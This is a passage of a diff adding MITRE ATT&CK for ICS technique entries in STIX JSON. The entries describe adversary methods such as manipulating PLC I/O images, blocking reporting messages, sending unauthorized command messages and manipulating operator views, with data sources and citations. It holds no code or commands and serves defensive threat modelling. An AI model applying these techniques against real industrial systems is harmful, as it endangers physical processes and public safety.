"x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Module: Module Load", + "Process: Process Creation", + "Process: Process Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0853", + "external_id": "T0853" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-17T15:14:31.276Z", + "name": "Remote System Information Discovery", + "description": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. \n\nRequests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Access", + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0888", + "external_id": "T0888" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Program Upload", + "description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0845", + "external_id": "T0845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.\n\nAn adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0819", + "external_id": "T0819" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T19:09:43.744Z", + "name": "Data from Information Repositories", + "description": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)\n\nInformation collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.\n\nIn a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Data Historian" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Share: Network Share Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0811", + "external_id": "T0811" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:19:41.272Z", + "name": "Transient Cyber Asset", + "description": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. \n\nAdversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. \n\nTransient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "created": "2021-10-14T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0864", + "external_id": "T0864" + }, + { + "source_name": "North American Electric Reliability Corporation June 2021", + "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", + "url": "https://www.nerc.com/files/glossary_of_terms.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:46:11.459Z", + "name": "Manipulate I/O Image", + "description": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. \n\nOne of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0835", + "external_id": "T0835" + }, + { + "source_name": "Dr. Kelvin T. Erickson December 2010", + "description": "Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 ", + "url": "https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Sniffing", + "description": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information. \n\nAn adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. \n\nIn addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0842", + "external_id": "T0842" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Network Sniffing Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Rootkit", + "description": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018) \n\nFirmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for the I/O that is attached to an asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable [Impact](https://attack.mitre.org/tactics/TA0105).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0851", + "external_id": "T0851" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Rootkit Retrieved. 2018/05/16 ", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Automated Collection", + "description": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Network Traffic: Network Traffic Content", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0802", + "external_id": "T0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2022-09-19T13:57:23.538Z", + "name": "Block Reporting Message", + "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Termination", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0804", + "external_id": "T0804" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-05T14:16:02.811Z", + "name": "Unauthorized Command Message", + "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Network Traffic: Network Traffic Content", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0855", + "external_id": "T0855" + }, + { + "source_name": "Benjamin Freed March 2019", + "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ", + "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-09-19T14:12:22.878Z", + "name": "Data Destruction", + "description": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)\n\nData destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident.\n\nStandard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Control Server", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_data_sources": [ + "File: File Deletion", + "File: File Modification", + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0809", + "external_id": "T0809" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of View", + "description": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nOperators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0832", + "external_id": "T0832" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Data Historian Compromise", + "description": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. \n\nDragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. (Citation: Industroyer - Dragos - 201810) The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be \"expected to have extensive connections\" within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.\n\nPermissions Required: Administrator\n\nContributors: Joe Slowik - Dragos", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "id": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0810", + "external_id": "T0810" + }, + { + "source_name": "Industroyer - Dragos - 201810", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": 